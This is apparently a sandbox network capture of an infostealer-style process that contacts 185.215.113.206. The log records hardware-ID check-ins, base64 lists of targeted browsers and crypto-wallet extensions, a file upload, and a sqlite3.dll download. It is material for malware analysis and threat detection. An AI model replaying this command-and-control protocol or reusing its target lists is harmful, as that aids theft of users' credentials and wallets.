Dec 14, 2024 23:58:36.238369942 CET	1236	IN	Data Raw: 65 62 f1 7e 33 b1 a6 ff 60 2a 1a fb 8e b0 13 f5 95 0c d8 c5 70 ae 62 96 cf 86 aa 6b da 8e ad fb 51 77 9f fd d1 46 ad b6 89 ce bc e5 32 2e db 95 56 49 ac 71 9d 76 ef 77 95 ee ac cb 59 dd a7 2f 81 3c 40 fa d2 99 53 64 4d ff 60 ec f8 82 ef 3f 39 61 Data Ascii: eb~3`pbkQwF2.VIqvwY/<@SdM`?9a3s!f$w/!h{C(`;v_op"t5QIzSC@[Uy;[t2nEu^^EOuoB:\|^q\%o$Qh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49855	185.215.113.206	80	3300	C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 23:58:41.197645903 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:58:42.525758028 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:58:42.528158903 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 44 45 43 39 36 42 35 34 33 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="hwid"5DEC96B543762778904926------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="build"stok------CBGCAFIIECBFIDHIJKFB--
Dec 14, 2024 23:58:43.015860081 CET	407	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:42 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 57 4a 6a 4f 44 6c 6a 4e 32 49 79 5a 44 42 69 59 6a 46 6c 4e 7a 4d 77 5a 44 49 33 4f 54 59 77 5a 54 6b 34 59 6d 49 30 4f 44 67 33 4d 54 59 7a 4e 54 55 31 4d 32 59 34 4f 54 55 30 5a 44 63 79 4d 44 51 7a 5a 54 55 30 4e 47 5a 68 4d 57 59 33 59 54 68 6c 59 6a 64 6b 4e 44 4d 32 5a 47 49 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MWJjODljN2IyZDBiYjFlNzMwZDI3OTYwZTk4YmI0ODg3MTYzNTU1M2Y4OTU0ZDcyMDQzZTU0NGZhMWY3YThlYjdkNDM2ZGI3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Dec 14, 2024 23:58:43.018755913 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFH Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="message"browsers------CAFIJKFHIJKKEBGCFBFH--
Dec 14, 2024 23:58:43.459492922 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:43 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2028 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 51 7a 70 63 55 48 4a 76 5a 33 4a 68 62 53 42 47 61 57 78 6c 63 31 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 58 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 58 48 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 44 42 38 51 32 68 79 62 32 31 70 64 57 31 38 58 45 4e 6f 63 6d 39 74 61 58 56 74 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 77 77 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8QzpcUHJvZ3JhbSBGaWxlc1xHb29nbGVcQ2hyb21lXEFwcGxpY2F0aW9uXHxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfDB8Q2hyb21pdW18XENocm9taXVtXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXwwfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8MHxUb3JjaHxcVG9yY2hcVXNlciBEYXRhfGNocm9tZXwwfDB8Vml2YWxkaXxcVml2YWxkaVxVc2VyIERhdGF8Y2hyb21lfHZpdmFsZGkuZXhlfCVMT0NBTEFQUERBVEElXFZpdmFsZGlcQXBwbGljYXRpb25cfENvbW9kbyBEcmFnb258XENvbW9kb1xEcmFnb25cVXNlciBEYXRhfGNocm9tZXwwfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGVwaWMuZXhlfCVMT0NBTEFQUERBVEElXEVwaWMgUHJpdmFjeSBCcm93c2VyXEFwcGxpY2F0aW9uXHxDb2NDb2N8XENvY0NvY1xCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8YnJvd3Nlci5leGV8QzpcUHJvZ3JhbSBGaWxlc1xDb2NDb2NcQnJvd3NlclxBcHBsaWNhdGlvblx8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDOlxQcm9ncmFtIEZpbGVzXEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxBcHBsaWNhdGlvblx8Q2Vu
Dec 14, 2024 23:58:43.459605932 CET	124	IN	Data Raw: 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 4a 55 78 50 51 30 46 4d 51 56 42 51 52 45 Data Ascii: dCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8JUxPQ0FMQVBQREFUQSVcQ2VudEJyb3dzZXJcQXBwbGljYXRpb25cfDdT
Dec 14, 2024 23:58:43.826636076 CET	896	IN	Data Raw: 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 4d 48 78 44 61 47 56 6b 62 33 51 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 51 32 68 6c 5a 47 39 30 58 46 Data Ascii: dGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfDB8MHxDaGVkb3QgQnJvd3NlcnxcQ2hlZG90XFVzZXIgRGF0YXxjaHJvbWV8MHwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8QzpcUHJvZ3JhbSBGaWxlcyAoeDg2KVxNaWNyb3NvZnRcRWRnZVxBcHB
Dec 14, 2024 23:58:43.828118086 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 42 41 46 49 44 41 45 43 42 47 43 42 46 48 4a 45 2d 2d 0d 0a Data Ascii: ------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------IEHCBAFIDAECBGCBFHJEContent-Disposition: form-data; name="message"plugins------IEHCBAFIDAECBGCBFHJE--
Dec 14, 2024 23:58:44.285970926 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:44 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 14, 2024 23:58:44.286041975 CET	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Dec 14, 2024 23:58:44.286071062 CET	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Dec 14, 2024 23:58:44.286262989 CET	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Dec 14, 2024 23:58:44.286292076 CET	224	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8Ymhn
Dec 14, 2024 23:58:44.290641069 CET	1236	IN	Data Raw: 61 47 39 68 62 57 46 77 59 32 52 77 59 6d 39 6f 63 47 68 70 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32 46 6c 5a 47 31 71 5a 47 5a 74 62 57 46 6f 61 47 4a 71 5a 57 5a 6a 59 6d Data Ascii: aG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGp
Dec 14, 2024 23:58:44.290786028 CET	1236	IN	Data Raw: 61 47 4e 68 5a 48 77 78 66 44 42 38 4d 48 78 53 59 57 6c 75 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 Data Ascii: aGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWF
Dec 14, 2024 23:58:44.299041033 CET	692	IN	Data Raw: 5a 6d 5a 73 62 32 31 69 59 6d 4e 6d 61 57 64 6a 61 57 70 71 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 Data Ascii: ZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9
Dec 14, 2024 23:58:44.303328991 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 37 62 32 64 30 62 62 31 65 37 33 30 64 32 37 39 36 30 65 39 38 62 62 34 38 38 37 31 36 33 35 35 35 33 66 38 39 35 34 64 37 32 30 34 33 65 35 34 34 66 61 31 66 37 61 38 65 62 37 64 34 33 36 64 62 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 44 42 41 45 47 49 49 49 44 48 4a 4b 45 47 44 42 2d 2d 0d 0a Data Ascii: ------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------IDHIDBAEGIIIDHJKEGDBContent-Disposition: form-data; name="message"fplugins------IDHIDBAEGIIIDHJKEGDB--
Dec 14, 2024 23:58:44.743570089 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:44 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 14, 2024 23:58:44.846818924 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFCFBFBFBKFIDHJKFCA Host: 185.215.113.206 Content-Length: 6855 Connection: Keep-Alive Cache-Control: no-cache
Dec 14, 2024 23:58:44.846818924 CET	6855	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 62 63 38 39 63 Data Ascii: ------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="token"1bc89c7b2d0bb1e730d27960e98bb48871635553f8954d72043e544fa1f7a8eb7d436db7------CBFCFBFBFBKFIDHJKFCAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Dec 14, 2024 23:58:45.922235012 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 14, 2024 23:58:46.181837082 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 14, 2024 23:58:46.653528929 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls 